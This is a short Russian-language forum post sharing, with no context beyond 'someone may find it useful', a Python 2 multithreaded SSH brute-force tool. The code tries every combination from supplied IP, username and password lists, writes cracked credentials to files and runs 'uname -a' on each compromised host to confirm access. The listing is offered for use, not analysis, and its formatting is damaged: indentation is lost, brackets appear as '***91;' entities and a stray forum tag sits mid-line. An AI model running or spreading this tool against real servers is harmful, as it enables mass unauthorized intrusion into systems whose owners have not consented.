Нашел в сети. Думаю кому-нибудь, да пригодится.
Ссылка скрыта от гостей
Python:
import paramiko, sys, Queue, threading
class SSHBrute(threading.Thread):
def __init__(self, queue):
threading.Thread.__init__(self)
self.queue = queue
def run(self):
while True:
ip,user,passwd = self.queue.get()
self.kraken(ip,user,passwd)
self.queue.task_done()
def kraken(self,ip,user,passwd):
try:
if ip in cracked: return False
if '%user%' in str(passwd):
passwd = passwd.split("%")***91;0***93; + user + passwd.split("%")***91;2***93;
if '%User%' in str(passwd):
pwd = user + passwd.split("%")***91;2***93;
passwd = passwd.split("%")***91;0***93;+pwd.title()
if str(passwd) == '%null%':
passwd = ''
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())[/SPOILER]
ssh.connect(ip, username=user, password=passwd, timeout=35)
raw.write(ip+' '+user+' '+passwd+'\n')
raw.flush()
chan = ssh.get_transport().open_session()
chan.settimeout(35)
chan.exec_command('uname -a')
data = chan.recv(1024)
if len(data) == 0:
nologs.write(ip+' '+user+' '+passwd+'\n')
nologs.flush()
return False
val.write(ip+' '+user+' '+passwd+'|'+data.rstrip()+'\n')
val.flush()
cracked.append(ip)
chan.close()
ssh.close()
return True
except Exception, e:
if 'uthent' in str(e):
if dbg == 'bad':
bad.write(ip+'\n')
bad.flush()
#print '\r***91;+***93;Tried '+ip+' '+user+' '+passwd+' '
ssh.close()
return False
#print ip, str(e)
ssh.close()
return False
def brutemain():
if len(sys.argv) < 2:
print """
SSH Brute Force Tool
Author: @Elohim ***91;RST***93;
Usage:
bruter ThreadNumber IpFile UserFile PassFile FilterSwitch*
*The filter Switch Takes Either the word "bad" or "no".
If you supply the word bad, it filters in bad.txt only the ips
which indeed support ssh AUTH and password didn't work"""
return False
ThreadNR = int(sys.argv***91;1***93;)
queue = Queue.Queue(maxsize=20000)
try:
i = 0
for i in range(ThreadNR):
t = SSHBrute(queue)
t.daemon = True
t.start()
i += 1
except Exception, e:
print 'Cant start more than',i,'Threads!'
global bad
global val
global nologs
global cracked
global raw
cracked = ***91;***93;
bad = open('bad.txt','w')
val = open('valid.txt','a')
nologs = open('nologins.txt','a')
raw = open('raw.txt','a')
with open(str(sys.argv***91;2***93;),'rU') as ipf: ips = ipf.read().splitlines()
with open(str(sys.argv***91;3***93;),'rU') as uf: users = uf.read().splitlines()
with open(str(sys.argv***91;4***93;),'rU') as pf: passwords = pf.read().splitlines()
global dbg
dbg = str(sys.argv***91;5***93;)
try:
for password in passwords:
for user in users:
for ip in ips:
queue.put((ip,user,password))
except:
pass
queue.join()
if __name__ == "__main__":
brutemain()